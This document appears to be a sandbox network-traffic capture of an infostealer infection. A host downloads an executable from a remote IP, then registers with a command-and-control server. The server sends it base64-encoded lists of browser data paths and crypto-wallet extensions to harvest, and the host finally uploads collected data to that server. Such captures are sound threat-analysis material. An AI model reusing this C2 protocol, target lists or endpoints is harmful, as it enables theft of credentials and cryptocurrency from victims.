Sep 4, 2024 17:37:50.751621962 CEST	1236	IN	Data Raw: dd 08 e8 54 66 5b 6b 69 ea 5c 60 37 84 66 03 40 9c aa aa da 44 74 a2 d5 a5 76 ce 2b d1 11 62 0f 22 14 36 41 6e 63 fc 22 ed 4e aa f9 aa 22 ed 71 51 10 96 98 bc 1b 7c 08 12 ef cb 87 4c e7 37 19 ea 91 cd cc 2e 8a 30 0d bc 41 79 a5 b2 63 47 f6 b8 30 Data Ascii: Tf[ki\`7f@Dtv+b"6Anc"N"qQ\|L7.0AycG0,cU)C?yRHlP/zuugJDTX.Z; \o-cmR\|y.6Q_M~;>WW6tY?Av`VAwn7TXWD
Sep 4, 2024 17:37:50.751637936 CEST	1236	IN	Data Raw: 53 34 93 d0 37 c1 63 ee 8b c0 04 70 6e a6 70 12 63 80 ca 45 1c 2b d9 42 1c 11 ab 4f d8 5e f1 c3 6d a3 05 8a 9c c2 c7 2b d2 80 5e 41 90 81 f1 13 ef 50 04 c6 d8 3f 0e 7a 04 67 48 86 b9 eb 94 ac 9c c1 d4 9b 84 0a 88 e0 b9 88 4e 0a a1 21 72 9c 05 bb Data Ascii: S47cpnpcE+BO^m+^AP?zgHN!r~C\G+P`)OHHc;Rt(YddeYR\g_osT 9^Z'>F$Dd.0y\P]NmquN\U"ja\R-%FNSB;R
Sep 4, 2024 17:37:50.756472111 CEST	1236	IN	Data Raw: 4f 07 18 f5 b4 18 6f 50 62 98 70 b0 c4 5f 4a c8 ab 0e 1a 3b 26 fa 2c 65 5a ad fc 79 5d 78 dc 8e 66 13 32 2b 9c 31 07 54 6e ca 00 d4 d4 68 f0 71 97 7e 69 43 eb ff cc 74 5c 22 df 8e be da 4d b9 c9 71 54 af 13 1a ce b2 e2 68 f6 a3 b2 f1 b7 a6 24 4e Data Ascii: OoPbp_J;&,eZy]xf2+1Tnhq~iCt\"MqTh$N}6-!:lmn\|DA,XVtf8#y4E]A_}}\|(dA!7oCtV;2_KOZ8KwSkfa/t
Sep 4, 2024 17:37:51.965430021 CEST	88	OUT	GET /prog/66d7077a2064d_l.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:52.149008036 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:52 GMT Content-Type: application/octet-stream Content-Length: 342568 Last-Modified: Tue, 03 Sep 2024 12:56:26 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d7077a-53a28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf~& @@ `$&W@(&`$ H.text `.rsrc@@@.reloc`@B`&H,`pN7nQ.de$[ABCU1#^56i%^Ea9[ctqZ;6z[^X'/VHW,w]~5"Ox2`b2X>=\l#xS,~,"z<cZ.m%}R?G*9Xs$FL@\{.J~\T@C:qnzlX3 k$Dq4

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	53043	147.45.68.138	80

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:53.930392027 CEST	88	OUT	GET / HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:37:54.873172998 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Sep 4, 2024 17:37:55.461945057 CEST	436	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAK Host: 147.45.68.138 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171-a33c7340-61ca------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------JDGIIJJDHDGCGDHIJDAK--
Sep 4, 2024 17:37:56.631472111 CEST	232	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|d55db221be8efc61fcb2dfbdb1ad2d08\|1\|1\|1\|0\|0\|50000\|10
Sep 4, 2024 17:37:56.675278902 CEST	511	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIII Host: 147.45.68.138 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="mode"1------DBKEHDGDGHCBGCAKFIII--
Sep 4, 2024 17:37:57.252681971 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED] Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
Sep 4, 2024 17:37:57.252707005 CEST	486	IN	Data Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
Sep 4, 2024 17:37:57.340959072 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Sep 4, 2024 17:37:57.476474047 CEST	511	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDH Host: 147.45.68.138 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="mode"2------DHIJEHJDHJKECBFHDHDH--
Sep 4, 2024 17:37:58.067727089 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED] Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
Sep 4, 2024 17:37:58.067744970 CEST	1236	IN	Data Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbG
Sep 4, 2024 17:37:58.067759037 CEST	128	IN	Data Raw: 76 59 57 52 6b 61 57 35 77 61 32 4a 68 61 58 77 78 66 44 46 38 4d 48 78 48 51 58 56 30 61 43 42 42 64 58 52 6f 5a 57 35 30 61 57 4e 68 64 47 39 79 66 44 42 38 61 57 78 6e 59 32 35 6f 5a 57 78 77 59 32 68 75 59 32 56 6c 61 58 42 70 63 47 6c 71 59 Data Ascii: vYWRkaW5wa2JhaXwxfDF8MHxHQXV0aCBBdXRoZW50aWNhdG9yfDB8aWxnY25oZWxwY2huY2VlaXBpcGlqYWxqa2JsYmNvYmx8MXwxfDF8VHJvbml1bXwxfHBubmRwbGN
Sep 4, 2024 17:37:58.073708057 CEST	1236	IN	Data Raw: 69 61 32 46 72 59 33 42 73 61 32 70 75 62 32 78 6e 59 6d 74 6b 5a 32 70 70 61 32 70 6c 5a 47 35 74 66 44 46 38 4d 48 77 77 66 46 52 79 64 58 4e 30 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 56 6e 61 6d 6c 6b 61 6d 4a 77 5a 32 78 70 59 32 68 6b 59 Data Ascii: ia2FrY3Bsa2pub2xnYmtkZ2ppa2plZG5tfDF8MHwwfFRydXN0IFdhbGxldHwxfGVnamlkamJwZ2xpY2hkY29uZGJjYmRuYmVlcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW
Sep 4, 2024 17:37:58.073736906 CEST	1236	IN	Data Raw: 73 62 32 6c 71 59 6e 42 76 62 47 56 70 59 57 31 68 66 44 46 38 4d 48 77 77 66 45 35 70 5a 32 68 30 62 48 6c 38 4d 58 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 Data Ascii: sb2lqYnBvbGVpYW1hfDF8MHwwfE5pZ2h0bHl8MXxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2Nna2hhfDF8MHwwfENvaW5odWJ8MXxqZ2FhaW1hamlwYnBkb2dwZGdsaGFwaGxkYWtpa2dlZnwxfDB8MHxMZWFwIENvc21vcy
Sep 4, 2024 17:37:58.073749065 CEST	128	IN	Data Raw: 78 66 44 42 38 4d 48 78 51 64 57 78 7a 5a 53 42 58 59 57 78 73 5a 58 51 67 51 32 68 79 62 32 31 70 64 57 31 38 4d 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a Data Ascii: xfDB8MHxQdWxzZSBXYWxsZXQgQ2hyb21pdW18MXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHwxfG1rcGVnamt
Sep 4, 2024 17:37:58.155172110 CEST	648	IN	Data Raw: 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 57 4e 72 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6d 62 47 74 74 5a 6d 68 6c 59 6d 56 6b 59 Data Ascii: ibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm
Sep 4, 2024 17:37:58.289428949 CEST	512	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHC Host: 147.45.68.138 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="mode"21------HJJJJKEHCAKFBFHJKEHC--
Sep 4, 2024 17:37:59.061048031 CEST	282	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180
Sep 4, 2024 17:38:00.169704914 CEST	181	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKK Host: 147.45.68.138 Content-Length: 5773 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:00.169706106 CEST	5773	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 Data Ascii: ------IDBFHJDAAFBAKEBGIJKKContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IDBFHJDAAFBAKEBGIJKKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IDBFHJDAAFBAKE
Sep 4, 2024 17:38:01.167398930 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
